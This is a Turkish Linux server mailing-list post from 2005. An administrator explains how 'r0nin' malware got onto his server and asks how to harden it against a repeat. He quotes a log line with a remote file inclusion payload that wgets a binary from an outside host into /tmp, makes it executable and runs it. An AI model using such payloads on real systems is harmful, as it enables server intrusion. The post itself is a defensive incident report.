From: The RED (jdred@gmx.net)
Date: Mon 18 Apr 2005 - 20:24:17 EEST
newpass'in dosyalarını ve çalışan işlemlerini silmiştim zaten. netstat ile
baktığımda anormal birşey görünmüyor. Daha önceki mailimdeki r0nin'in nasıl
bulaştığını tesbit ettim. Sunucudaki sitelerin birindeki php-nuke benzeri
bri portal yazılımındaki bir php dosyası (resim galeri veya dosya upload ile
ilgili herhalde) ile r0nin internetten /tmp dizinime indirilmiş ve
çalıştırılmış. Sitenin domain loglarındaki ilgili satır aşağıda:
./******.com:377:85.97.31.* - - [17/Apr/2005:13:52:04 +0300] "GET
/library/lib.php?root=http://members.lycos.co.uk/saudix/Cmd/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.fendora.net/asc/xpl/r0nin;chmod%20777%20r0nin;./r0nin
HTTP/1.1" 200 8543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR;
rv:1.7.6) Gecko/20050321 Firefox/1.0.2"
Bunu tesbit ettim ve sildim, ama benzer bir yazılımı sunucudaki herhangi bir
kullanıcı bilinçli veya bilinçsiz olarak yükleyebilir. Bu şekilde sunucuya
nası bu kadar kolayca dosya indirilip çalıştırılabilir anlamıyorum.
Sunucudaki yazılımların tümü (cpanel, apache, php vs.) son sürüm, bugün
cpanel içinden bazı ayarlamalar da yaptım (mod_userdir, php open_basedir
korumaları), kernelim de öyle çok fazla eski değil.. (2.4.22)
Bildiğim kadarıyla bu açık taaa geçen sene aralık ayında falan çıkmıştı
(phpBB'de çıkmıştı ilk olarak diye hatırlıyorum) ve php 4.3.10'dan itibaren
yamandı diye biliyorum. bende 4.3.11 yüklü..
E peki yazılımlar da güncelse nasıl korunacağım ki ben bundan?? her önüne
gelen bu php scripti ile dosya yükleyip çalıştıracak mı sunucuya??? Hatta o
scripte de gerek yok, o scriptteki iki-üç satır kod yapıyor zaten bu
şeyleri..
Diğer konu ise hala açıklığa kavuşmadı. r0nin web üzerinden çalıştırılmış
onu anladık. Ama /var/tmp dizinine nasıl bağlanarak shell komutları doğrudan
çalıştırılabiliyor? Bunlar web üzerinden değil doğrudan shellden
çalıştırılmış.
Daha önce sormuştum henüz yanıt alamadım, /var/tmp dizinini noexec olarak
mount edemedik başta, peki o dizinin yetkisini sadece root üzerine alsam, o
zaman nobody ile çalışan bu dosyaları önleyebilir miyim??
windows bile virüslerden çoğu zaman tamamen temizlenebiliyorken son sürüm
yazılımlar kullanılmış bir linux sunucuya nasıl böyle şeyler bulaşabiliyor,
hadi bulaştı diyelim, nasıl format atmadan temizlenemiyor? öneride bulunan
çoğu kişi o sunucudan artık hayır gelmez, yeniden kur diyor. Birincisi bu
bir webserver (hele ki cpanel kurulu, birsürü ayarları var vs.) o yüzden
ayarları bozmadan yedekleyip yeniden aynı hale getirmek çok zor.. Kurdum
diyelim, yine aynı sürüm apache, aynı sürüm php kullanacağım mecburen, yine
aynı problemin olmayacağını nasıl bileceğim o zaman? Bu çok eski bir sunucu
değil. 2 yıldır yayında olan daha eski bir sunucumda bile böyle birşey
olmamıştı.
Teşekkürler.
----- Original Message -----
From: "Nihat Ciddi" <nakof@zig.gen.tr>
To: <linux-sunucu@liste.linux.org.tr>
Sent: Monday, April 18, 2005 7:03 PM
Subject: Re: [Linux-sunucu] r0nin
_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
